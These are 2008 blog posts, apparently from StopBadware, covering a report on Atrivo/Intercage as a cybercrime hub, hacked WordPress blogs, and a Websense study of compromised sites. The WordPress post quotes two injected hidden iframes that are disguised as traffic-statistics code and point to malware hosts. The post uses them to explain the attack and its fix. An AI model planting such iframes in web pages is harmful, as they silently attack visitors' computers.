Report calls out Atrivo (Intercage) and affiliates

Jart Armin, community volunteer and intrepid security researcher, released a report today that concludes that Intercage and Atrivo, a California-based family of companies that operate web hosting, domain registration, and other online services, are a hub of badware activity:

Atrivo is a major hub of cyber crime based within the USA, and has been known as such within the Internet
community for many years. Within this study we provide detailed evidence not only for public and community
awareness but also to provide evidence for action.


Atrivo's reach in the cyber crime community and the Internet as a whole runs deep. From their partners in crime, to
the domain registration and hosting services it has to be remembered this is deliberately misleading to avoid

Some of the companies included in the report have built a reputation in the security community as being havens for this type of activity, and Jart's extensive research raises questions about the degree to which these companies are aware of, and turn a blind eye to, badware activity on their systems.
The author and his collaborators also produced a video demonstrating how an Internet user can have his computer exploited via the systems and methods they describe in the report.

Note: contributed data (based on our analysis of data received from Google and supplemented with information from Team Cymru) to Mr. Armin, as we support community-based research into badware trends. We did not vet, and do not have any official position on, the report's conclusions.

StopBadware discussion group sees flurry of hacked WordPress blogs

Posted on February 18, 2008 - 16:23 by egeorge

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group
began receiving in January a flurry of reports about WordPress
blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both
of the following iframes were injected into their posts:

<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

<!-- Traffic Statistics -->
<iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren't put on the
pages by the authors, and they're not for traffic statistics. The iframes,
hosted on sites in Beijing, China, attack a visitor's computer with the virus

In this
StopBadware thread
about the iframes
a post by member Ty H describes how to use WordPress Site Admin to repair
defaced blog posts.

In addition to repairing the pages, webmasters need to close the
vulnerability that allows the iframe injections to occur.

On Feb. 5,
WordPress issued version 2.3.3, an urgent security release
to patch a flaw
in xmlrpc.php that allowed a user to edit posts of other users. It's not stated
whether this release is a response to the iframe injections, but the discussion
group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers
using automated crawlers. You can register at
to receive email notifications when new versions are
announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at

When users solve problems together in the StopBadware discussion group and
report their findings, it helps others who encounter the same problem later.

Half of malware-distributing websites have been hacked

Posted on January 22, 2008 - 16:40 by egeorge

Security vendor Websense has released a report showing that half of the malware-distributing websites it examined in the second part of 2007 were otherwise legitimate sites that had been hacked. The report points to unpatched software vulnerabilities and problems on shared hosting servers as key infection points for hacked sites.

For the many owners of hacked websites StopBadware has worked with over the past year, the fact that so many other sites are in the same predicament is slim consolation for the damage caused. Many owners of small business, nonprofit, and interest-based sites are what we at StopBadware have come to call "consumer webmasters" - website owners who've taken advantage of easy and cheap hosting plans and the simplicity of many content management systems to create fully functioning websites without needing technical skills. When a consumer webmaster's site is hacked, he or she has no technical staff to turn to, and may not even know where to look online for help.

If you're a website owner, don't wait until your site is hacked to find help. Talk with your web hosting provider about their security precautions, and ask them how they'd handle a malicious attack. Look for user forums for the software you use to manage your site, and make sure you'll be one of the first to know when there are new security updates. Finding a network of others working with the same website setup will mean you have peers to turn to if your site ever does run into problems.

Of course, StopBadware's own resources are also available. Our security tips for webmasters is designed for owners of any site, whether or not it has been the victim of a hacking attack. And our discussion group is a growing community where webmasters (and any internet user) can seek help and advice. For every internet user, the hacking of legitimate websites is a reason for caution. Even trusted sites can be attacked, so it's important to protect your computer regardless of where your web surfing takes you. If you don't know where to begin, start at our help pages on badware.